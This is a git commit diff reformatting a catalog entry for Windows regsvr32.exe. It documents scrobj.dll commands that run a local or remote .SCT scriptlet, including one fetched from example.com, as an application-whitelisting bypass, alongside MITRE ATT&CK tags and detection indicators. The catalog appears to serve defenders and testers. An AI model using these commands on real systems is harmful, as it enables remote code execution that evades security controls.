Changed all OSBinaries according to the new template

2025-07-27 12:42:19 +02:00 · 2018-09-24 21:59:43 +02:00
parent 68884a4c13
commit 37cc1ee83e
66 changed files with 1448 additions and 698 deletions
--- a/yml/OSBinaries/Regsvr32.yml
+++ b/yml/OSBinaries/Regsvr32.yml
@@ -1,22 +1,54 @@
 ---
 Name: Regsvr32.exe
-Description: Execute
-Author: ''
+Description: Used by Windows to register dlls
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
  - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
    Description: Execute the specified remote .SCT script with scrobj.dll.
-  - Commands: regsvr32.exe /s /u /i:file.sct scrobj.dll
+    Usecase: Execute code from remote scriptlet, bypass Application whitelisting
+    Category: AWL bypass
+    Privileges: User
+    MitreID: T1117
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1117
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+  - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
    Description: Execute the specified local .SCT script with scrobj.dll.
+    Usecase: Execute code from scriptlet, bypass Application whitelisting
+    Category: AWL bypass
+    Privileges: User
+    MitreID: T1117
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1117
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+  - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
+    Description: Execute the specified remote .SCT script with scrobj.dll.
+    Usecase: Execute code from remote scriptlet, bypass Application whitelisting
+    Category: Execute
+    Privileges: User
+    MitreID: T1117
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1117
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+  - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
+    Description: Execute the specified local .SCT script with scrobj.dll.
+    Usecase: Execute code from scriptlet, bypass Application whitelisting
+    Category: Execute
+    Privileges: User
+    MitreID: T1117
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1117
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full Path:
-  - C:\Windows\System32\regsvr32.exe
-  - C:\Windows\SysWOW64\regsvr32.exe
-Code Sample: []
-Detection: []
+  - Path: C:\Windows\System32\regsvr32.exe
+  - Path: C:\Windows\SysWOW64\regsvr32.exe
+Code Sample: 
+- Code:
+Detection:
+ - IOC: regsvr32.exe getting files from Internet
+ - IOC: regsvr32.exe executing scriptlet files
 Resources:
-  - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Regsvr32.md
-  - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
-  - https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
-Notes: Thanks to Casey Smith - @subtee
-
+  - Link: https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
+  - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
+  - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1117/T1117.md
+Acknowledgement:
+  - Person: Casey Smith
+    Handle: '@subtee'
+---